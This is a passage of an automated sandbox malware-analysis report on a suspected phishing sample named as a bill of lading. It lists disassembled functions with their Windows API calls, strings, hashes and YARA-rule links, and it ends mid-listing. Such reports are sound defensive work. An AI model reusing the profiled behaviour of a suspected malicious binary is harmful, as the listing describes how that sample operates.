                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                      • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                                      • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                      • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                                      Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                                      • _wcslen.LIBCMT ref: 00450944
                                                                                                                      • _wcscat.LIBCMT ref: 00450955
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                      • String ID: -----$SysListView32
                                                                                                                      • API String ID: 4008455318-3975388722
                                                                                                                      • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                      • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                                      • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                      • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                      Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00448625
                                                                                                                      • CreateMenu.USER32 ref: 0044863C
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                      • IsMenu.USER32(?), ref: 004486EB
                                                                                                                      • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                      • DrawMenuBar.USER32 ref: 00448742
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 176399719-4108050209
                                                                                                                      • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                      • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                      • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                      • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                      Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                      • GetParent.USER32 ref: 004692A4
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                      • GetParent.USER32 ref: 004692C7
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 2040099840-1403004172
                                                                                                                      • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                      • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                      • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                      • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                      Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                      • GetParent.USER32 ref: 0046949E
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                      • GetParent.USER32 ref: 004694C1
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 2040099840-1403004172
                                                                                                                      • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                      • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                      • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                      • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                      Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                                      • SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
                                                                                                                      • SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                                        • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3771399671-0
                                                                                                                      • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                      • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                                      • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                      • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                                      Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3413494760-0
                                                                                                                      • Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                                      • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                                                      • Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                                      • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                                      Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                      • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                      • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                      • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                                      Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll
                                                                                                                      • String ID: 0%d$DOWN$OFF
                                                                                                                      • API String ID: 3832890014-468733193
                                                                                                                      • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                      • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                                                      • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                      • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                                                      Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                      • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                      • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                      • __swprintf.LIBCMT ref: 0045EB1F
                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                      Strings
                                                                                                                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                      • API String ID: 43541914-1568723262
                                                                                                                      • Opcode ID: 59f20d5c687eca5b8ac21bf224ed8e62dc0999386ac77495242af5446a13f09a
                                                                                                                      • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                      • Opcode Fuzzy Hash: 59f20d5c687eca5b8ac21bf224ed8e62dc0999386ac77495242af5446a13f09a
                                                                                                                      • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                      Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DecrementInterlocked$Sleep
                                                                                                                      • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                                                      • API String ID: 2250217261-3412429629
                                                                                                                      • Opcode ID: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                      • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                                                      • Opcode Fuzzy Hash: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                      • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                                                      Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 0-1603158881
                                                                                                                      • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                      • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                      • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                      • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                      Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00479D1F
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                        • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                        • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                        • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                        • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                      • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 665237470-60002521
                                                                                                                      • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                      • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                      • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                      • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                      Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
